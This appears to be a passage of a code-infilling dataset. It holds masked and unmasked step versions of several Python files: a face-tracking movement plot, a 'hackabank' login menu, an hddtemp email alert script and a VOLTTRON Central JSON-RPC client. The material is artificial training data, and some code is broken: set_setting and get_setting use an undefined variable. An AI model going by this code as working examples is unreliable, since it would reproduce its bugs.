X = screen_x1 - face_x2
Y = screen_y1 - face_y2
d_x = (X*X)
d_y = (Y*Y)
D = d_x + d_y
distance = math.sqrt(D)
#print(distance)
plt.scatter(counter ,distance, s= 50,linewidth=1)
plt.xlabel("Time")
plt.ylabel("Movement of student from the center of screen")
plt.tight_layout()
except IndexError as e:
print('Graph ended')
exit(0)
ani = FuncAnimation(plt.gcf(), animate, interval=1000)
plt.savefig("Scatter_Graph.png")
plt.tight_layout()
plt.show()
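# Editorial note (assumption, not in the original): plt.savefig() called
# before plt.show() captures only the initial, empty frame of a
# FuncAnimation. To persist the animation itself, matplotlib's writer API
# could be used instead, e.g.
#     from matplotlib.animation import PillowWriter
#     ani.save('movement.gif', writer=PillowWriter(fps=1))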
|
flexible
|
{
"blob_id": "239f055fd76a3ecb5f384c256ad850ea42739b8f",
"index": 9710,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\n<mask token>\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\nx_vals = []\nroot = Tk()\ncounter = 0\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom facedetectandtrack import *\nx_vals = []\nroot = Tk()\ncounter = 0\nplt.style.use('seaborn')\n\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals, 0]\n y = data.iloc[x_vals, 1]\n if counter > 10:\n x_vals.pop(0)\n plt.cla()\n axes = plt.gca()\n axes.set_ylim([0, 30])\n counter = counter + 1\n height = root.winfo_screenheight()\n width = root.winfo_screenwidth()\n screen_x1 = width / 2\n screen_y1 = height / 2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = X * X\n d_y = Y * Y\n D = d_x + d_y\n distance = math.sqrt(D)\n plt.scatter(counter, distance, s=50, linewidth=1)\n plt.xlabel('Time')\n plt.ylabel('Movement of student from the center of screen')\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig('Scatter_Graph.png')\nplt.tight_layout()\nplt.show()\n",
"step-5": "\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport math\nfrom tkinter import * \nfrom tkinter.ttk import *\nfrom facedetectandtrack import *\n \nx_vals = []\nroot = Tk()\n\n\ncounter=0\n#def graph():\nplt.style.use('seaborn')\n\ndef animate(i):\n data = pd.read_csv('data.csv')\n global x_vals\n global counter\n x_vals.append(counter)\n try:\n x = data.iloc[x_vals,0]\n y = data.iloc[x_vals,1] \n if counter>10:\n x_vals.pop(0)\n\n plt.cla()\n axes=plt.gca()\n axes.set_ylim([0,30])\n #plt.plot(x, y)\n counter=counter+1\n\n height = root.winfo_screenheight() \n width = root.winfo_screenwidth() \n screen_x1 = width/2\n screen_y1 = height/2\n X = screen_x1 - face_x2\n Y = screen_y1 - face_y2\n d_x = (X*X)\n d_y = (Y*Y)\n D = d_x + d_y\n distance = math.sqrt(D)\n #print(distance)\n plt.scatter(counter ,distance, s= 50,linewidth=1)\n\n plt.xlabel(\"Time\")\n plt.ylabel(\"Movement of student from the center of screen\")\n\n\n plt.tight_layout()\n except IndexError as e:\n print('Graph ended')\n exit(0)\n\nani = FuncAnimation(plt.gcf(), animate, interval=1000)\nplt.savefig(\"Scatter_Graph.png\")\n\nplt.tight_layout()\nplt.show()",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/env python3
import sql_manager
import Client
from getpass import getpass
from settings import EXIT_CMD
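# EXIT_CMD is assumed to be a collection of exit keywords (e.g. a tuple such
# as ("exit", "quit")) defined in the project's local settings module, which
# is not part of this record.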
def main_menu():
print("""Welcome to our bank service. You are not logged in.
Please register or login""")
while True:
command = input("guest@hackabank$ ")
if command == "register":
username = input("Enter your username: ")
password = getpass(prompt="Enter your password: ")
sql_manager.register(username, password)
print("Registration Successfull")
elif command == "login":
username = input("Enter your username: ")
password = getpass(prompt="Enter your password: ")
logged_user = sql_manager.login(username, password)
if logged_user:
logged_menu(logged_user)
else:
print("Login failed")
continue
elif command == "help":
print("""login - for logging in!
register - for creating new account!
exit - for closing program!""")
elif command == "exit":
break
else:
print("Not a valid command")
continue
def logged_menu(logged_user):
print("Welcome you are logged in as: " + logged_user.get_username())
while True:
command = input("{}@hackabank# ".format(logged_user.get_username()))
if command == "info":
print("You are: " + logged_user.get_username())
print("Your id is: " + str(logged_user.get_id()))
print("Your balance is:" + str(logged_user.get_balance()) + "$")
elif command == "changepass":
new_pass = input("Enter your new password: ")
sql_manager.change_pass(new_pass, logged_user)
elif command == "change-message":
new_message = input("Enter your new message: ")
sql_manager.change_message(new_message, logged_user)
elif command == "show-message":
print(logged_user.get_message())
elif command == "help":
print("info - for showing account info")
print("changepass - for changing passowrd")
print("change-message - for changing users message")
print("show-message - for showing users message")
elif command in EXIT_CMD:
break
else:
print("Not such a command!")
continue
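

# Hedged entry point (an assumption — the original record does not show how
# main_menu() is invoked):
if __name__ == '__main__':
    main_menu()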
|
normal
|
{
"blob_id": "ee4fd4aef7ecdfbc8ff53028fdedc558814f46a7",
"index": 2383,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-3": "<mask token>\n\n\ndef main_menu():\n print(\n \"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\"\n )\n while True:\n command = input('guest@hackabank$ ')\n if command == 'register':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n sql_manager.register(username, password)\n print('Registration Successfull')\n elif command == 'login':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n logged_user = sql_manager.login(username, password)\n if logged_user:\n logged_menu(logged_user)\n else:\n print('Login failed')\n continue\n elif command == 'help':\n print(\n \"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\"\n )\n elif command == 'exit':\n break\n else:\n print('Not a valid command')\n continue\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-4": "import sql_manager\nimport Client\nfrom getpass import getpass\nfrom settings import EXIT_CMD\n\n\ndef main_menu():\n print(\n \"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\"\n )\n while True:\n command = input('guest@hackabank$ ')\n if command == 'register':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n sql_manager.register(username, password)\n print('Registration Successfull')\n elif command == 'login':\n username = input('Enter your username: ')\n password = getpass(prompt='Enter your password: ')\n logged_user = sql_manager.login(username, password)\n if logged_user:\n logged_menu(logged_user)\n else:\n print('Login failed')\n continue\n elif command == 'help':\n print(\n \"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\"\n )\n elif command == 'exit':\n break\n else:\n print('Not a valid command')\n continue\n\n\ndef logged_menu(logged_user):\n print('Welcome you are logged in as: ' + logged_user.get_username())\n while True:\n command = input('{}@hackabank# '.format(logged_user.get_username()))\n if command == 'info':\n print('You are: ' + logged_user.get_username())\n print('Your id is: ' + str(logged_user.get_id()))\n print('Your balance is:' + str(logged_user.get_balance()) + '$')\n elif command == 'changepass':\n new_pass = input('Enter your new password: ')\n sql_manager.change_pass(new_pass, logged_user)\n elif command == 'change-message':\n new_message = input('Enter your new message: ')\n sql_manager.change_message(new_message, logged_user)\n elif command == 'show-message':\n print(logged_user.get_message())\n elif command == 'help':\n print('info - for showing account info')\n print('changepass - for changing passowrd')\n print('change-message - for changing users message')\n print('show-message - for showing users message')\n elif command in EXIT_CMD:\n break\n else:\n print('Not such a command!')\n continue\n",
"step-5": "#!/usr/bin/env python3\nimport sql_manager\nimport Client\nfrom getpass import getpass\nfrom settings import EXIT_CMD\n\n\ndef main_menu():\n print(\"\"\"Welcome to our bank service. You are not logged in.\n Please register or login\"\"\")\n\n while True:\n command = input(\"guest@hackabank$ \")\n\n if command == \"register\":\n username = input(\"Enter your username: \")\n password = getpass(prompt=\"Enter your password: \")\n sql_manager.register(username, password)\n print(\"Registration Successfull\")\n elif command == \"login\":\n username = input(\"Enter your username: \")\n password = getpass(prompt=\"Enter your password: \")\n logged_user = sql_manager.login(username, password)\n\n if logged_user:\n logged_menu(logged_user)\n else:\n print(\"Login failed\")\n continue\n\n elif command == \"help\":\n print(\"\"\"login - for logging in!\n register - for creating new account!\n exit - for closing program!\"\"\")\n\n elif command == \"exit\":\n break\n\n else:\n print(\"Not a valid command\")\n continue\n\n\ndef logged_menu(logged_user):\n print(\"Welcome you are logged in as: \" + logged_user.get_username())\n while True:\n command = input(\"{}@hackabank# \".format(logged_user.get_username()))\n\n if command == \"info\":\n print(\"You are: \" + logged_user.get_username())\n print(\"Your id is: \" + str(logged_user.get_id()))\n print(\"Your balance is:\" + str(logged_user.get_balance()) + \"$\")\n\n elif command == \"changepass\":\n new_pass = input(\"Enter your new password: \")\n sql_manager.change_pass(new_pass, logged_user)\n\n elif command == \"change-message\":\n new_message = input(\"Enter your new message: \")\n sql_manager.change_message(new_message, logged_user)\n\n elif command == \"show-message\":\n print(logged_user.get_message())\n\n elif command == \"help\":\n print(\"info - for showing account info\")\n print(\"changepass - for changing passowrd\")\n print(\"change-message - for changing users message\")\n print(\"show-message - for showing users message\")\n elif command in EXIT_CMD:\n break\n else:\n print(\"Not such a command!\")\n continue\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
recipient = input('recipient: ')
sender = input('sender: ')
password = input('sender password: ')
subject = 'hdd temp alert'
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',
shell=True)
text = output.decode('utf-8')
text = text.encode('ascii', 'ignore')
text = text.decode('ascii')
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
import os
import subprocess
import emailgen
recipient = input('recipient: ')
sender = input('sender: ')
password = input('sender password: ')
subject = 'hdd temp alert'
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',
shell=True)
text = output.decode('utf-8')
text = text.encode('ascii', 'ignore')
text = text.decode('ascii')
text += '\nHostname: ' + os.uname().nodename
emailgen.sendAlert(recipient, subject, text, sender, password)
<|reserved_special_token_1|>
#!/usr/bin/env python3
import os
import subprocess
import emailgen
#
# Header information
#
recipient = input("recipient: ")
sender = input("sender: ")
password = input("sender password: ")
subject = "hdd temp alert"
#
# Get hdd temp, format for email
#
output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)
text = output.decode('utf-8')
#
# Email requires ascii
#
text = text.encode('ascii', 'ignore')
text = text.decode('ascii')
#
# Add descriptive information to text
#
text += "\nHostname: " + os.uname().nodename
#
# Call sendAlert function
#
emailgen.sendAlert(recipient, subject, text, sender, password)
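
#
# For reference, a minimal sketch of what the local emailgen module's
# sendAlert helper might look like. This is an illustrative assumption:
# the real emailgen module is not shown here, and the SMTP host below is
# a placeholder for an SSL-capable mail server.
#
import smtplib
from email.mime.text import MIMEText


def _send_alert_sketch(recipient, subject, text, sender, password):
    # Build a plain-text message with the usual headers
    msg = MIMEText(text)
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = recipient
    # Log in over implicit-TLS SMTP (port 465) and send
    with smtplib.SMTP_SSL('smtp.example.com', 465) as server:
        server.login(sender, password)
        server.sendmail(sender, [recipient], msg.as_string())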
|
flexible
|
{
"blob_id": "26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058",
"index": 7680,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-3": "<mask token>\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-4": "import os\nimport subprocess\nimport emailgen\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-5": "#!/usr/bin/env python3\nimport os\nimport subprocess\nimport emailgen\n\n\n#\n# Header information\n#\nrecipient = input(\"recipient: \")\nsender = input(\"sender: \")\npassword = input(\"sender password: \")\nsubject = \"hdd temp alert\"\n\n#\n# Get hdd temp, format for email\n#\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)\ntext = output.decode('utf-8')\n\n#\n# Email requires ascii\n#\ntext = text.encode('ascii','ignore')\ntext = text.decode('ascii')\n\n#\n# Add descriptive information to text\n#\ntext += \"\\nHostname: \" + os.uname().nodename\n\n#\n# Call sendAlert function\n#\nemailgen.sendAlert(recipient, subject, text, sender, password)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import requests
"""
This example exposes the VOLTTRON web API
through a python class that does not depend
on VOLTTRON proper. A VOLTTRON Central Agent must
be running on the url passed to the constructor.
"""
class VolttronWebRPC(object):
def __init__(self, url, username='admin', password='admin'):
"""
:param url: Jsonrpc endpoint for posting data.
:param username:
:param password:
"""
self._url = url
self._username = username
self._password = password
self._auth_token = None
self._auth_token = self.get_auth_token()
def do_rpc(self, method, **params):
"""
Generic method to request data from Volttron Central
:param method: Method to call
:param params: Any method specific keyword arguments
"""
data = {
'jsonrpc': '2.0',
'method': method,
'params': params,
'authorization': self._auth_token,
'id': '1'
}
r = requests.post(self._url, json=data)
validate_response(r)
return r.json()['result']
def get_auth_token(self):
"""
Get an authorization token from Volttron Central,
automatically called when the object is created
"""
return self.do_rpc('get_authorization',
username=self._username,
password=self._password)
def register_instance(self, addr, name=None):
"""
Register a platform with Volttron Central
:param addr: Platform's discovery address that will be registered
"""
        return self.do_rpc('register_instance', discovery_address=addr,
display_name=name)
def list_platforms(self):
"""
Get a list of registered platforms from Volttron Central.
"""
return self.do_rpc('list_platforms')
def install_agent(self, platform_uuid, fileargs):
"""
Install an agent on a platform
:param platform_uuid: uuid of platform where agent will be installed
:param fileargs: arguments for installing the agent
"""
rpc = 'platforms.uuid.{}.install'.format(platform_uuid)
return self.do_rpc(rpc, files=[fileargs])
def list_agents(self, platform_uuid):
"""
List agents installed on a platform
"""
return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')
def unregister_platform(self, platform_uuid):
"""
Unregister a platform with Volttron Central
"""
return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)
def store_agent_config(self, platform_uuid, agent_identity, config_name,
raw_contents, config_type="json"):
"""
        Add a file to an agent's config store
        :param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that will own the config
:param config_name: name of the configuration file
:param raw_contents: file data
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw_contents=raw_contents,
config_type=config_type)
return self.do_rpc("store_agent_config", **params)
def list_agent_configs(self, platform_uuid, agent_identity):
"""
List the configuration files stored for an agent.
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the configs
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity)
return self.do_rpc("list_agent_configs", **params)
def get_agent_config(self, platform_uuid, agent_identity, config_name,
raw=True):
"""
Get a config file from an agent's Configuration Store
:param platform_uuid: uuid of platform where agent is installed
:param agent_identity: VIP identity of agent that owns the config
:param config_name: name of the configuration file
"""
params = dict(platform_uuid=platform_uuid,
agent_identity=agent_identity,
config_name=config_name,
raw=raw)
return self.do_rpc("get_agent_config", **params)
def set_setting(self, setting, value):
"""
Assign a value to a setting in Volttron Central
:param setting: Name of the setting to set
:param value: Value to assign to setting
"""
        return self.do_rpc("set_setting", key=setting, value=value)
def get_setting(self, setting):
"""
Get the value of a setting in Volttron Central
:param setting: Name of the setting to get
"""
        return self.do_rpc("get_setting", key=setting)
def get_setting_keys(self):
"""
        Get a list of settings in Volttron Central
"""
return self.do_rpc("get_setting_keys")
def validate_response(response):
"""
Validate that the message is a json-rpc response.
:param response:
:return:
"""
assert response.ok
rpcdict = response.json()
assert rpcdict['jsonrpc'] == '2.0'
assert rpcdict['id']
assert 'error' in rpcdict.keys() or 'result' in rpcdict.keys()
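

if __name__ == '__main__':
    # Minimal usage sketch. Assumptions: a VOLTTRON Central instance is
    # reachable at the URL below and still uses the default admin/admin
    # credentials; adjust both for a real deployment.
    vc = VolttronWebRPC('http://localhost:8080/jsonrpc')
    for platform in vc.list_platforms():
        print(platform)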
|
normal
|
{
"blob_id": "6fdfcbcfdf2b680a1fbdb74f77fd5d1a9f7eac0b",
"index": 6105,
"step-1": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass VolttronWebRPC(object):\n\n def __init__(self, url, username='admin', password='admin'):\n \"\"\"\n :param url: Jsonrpc endpoint for posting data.\n :param username:\n :param password:\n \"\"\"\n self._url = url\n self._username = username\n self._password = password\n self._auth_token = None\n self._auth_token = self.get_auth_token()\n\n def do_rpc(self, method, **params):\n \"\"\"\n Generic method to request data from Volttron Central\n\n :param method: Method to call\n :param params: Any method specific keyword arguments\n \"\"\"\n data = {'jsonrpc': '2.0', 'method': method, 'params': params,\n 'authorization': self._auth_token, 'id': '1'}\n r = requests.post(self._url, json=data)\n validate_response(r)\n return r.json()['result']\n <mask token>\n <mask token>\n\n def list_platforms(self):\n \"\"\"\n Get a list of registered platforms from Volttron Central.\n \"\"\"\n return self.do_rpc('list_platforms')\n\n def install_agent(self, platform_uuid, fileargs):\n \"\"\"\n Install an agent on a platform\n\n :param platform_uuid: uuid of platform where agent will be installed\n :param fileargs: arguments for installing the agent\n \"\"\"\n rpc = 'platforms.uuid.{}.install'.format(platform_uuid)\n return self.do_rpc(rpc, files=[fileargs])\n\n def list_agents(self, platform_uuid):\n \"\"\"\n List agents installed on a platform\n \"\"\"\n return self.do_rpc('platforms.uuid.' + platform_uuid + '.list_agents')\n\n def unregister_platform(self, platform_uuid):\n \"\"\"\n Unregister a platform with Volttron Central\n \"\"\"\n return self.do_rpc('unregister_platform', platform_uuid=platform_uuid)\n\n def store_agent_config(self, platform_uuid, agent_identity, config_name,\n raw_contents, config_type='json'):\n \"\"\"\n Add a file to the an agent's config store\n\n :param platform_uuid: uuid of platform where agent will is installed\n :param agent_identity: VIP identity of agent that will own the config\n :param config_name: name of the configuration file\n :param raw_contents: file data\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw_contents=\n raw_contents, config_type=config_type)\n return self.do_rpc('store_agent_config', **params)\n\n def list_agent_configs(self, platform_uuid, agent_identity):\n \"\"\"\n List the configuration files stored for an agent.\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the configs\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity)\n return self.do_rpc('list_agent_configs', **params)\n\n def get_agent_config(self, platform_uuid, agent_identity, config_name,\n raw=True):\n \"\"\"\n Get a config file from an agent's Configuration Store\n\n :param platform_uuid: uuid of platform where agent is installed\n :param agent_identity: VIP identity of agent that owns the config\n :param config_name: name of the configuration file\n \"\"\"\n params = dict(platform_uuid=platform_uuid, agent_identity=\n agent_identity, config_name=config_name, raw=raw)\n return self.do_rpc('get_agent_config', **params)\n <mask token>\n\n def get_setting(self, setting):\n \"\"\"\n Get the value of a setting in Volttron Central\n\n :param setting: Name of the setting to get\n \"\"\"\n return self.do_rpc('get_setting', key=key)\n\n def get_setting_keys(self):\n \"\"\"\n Get a list of settings in Volttorn Central\n \"\"\"\n return self.do_rpc('get_setting_keys')\n\n\n<mask token>\n",
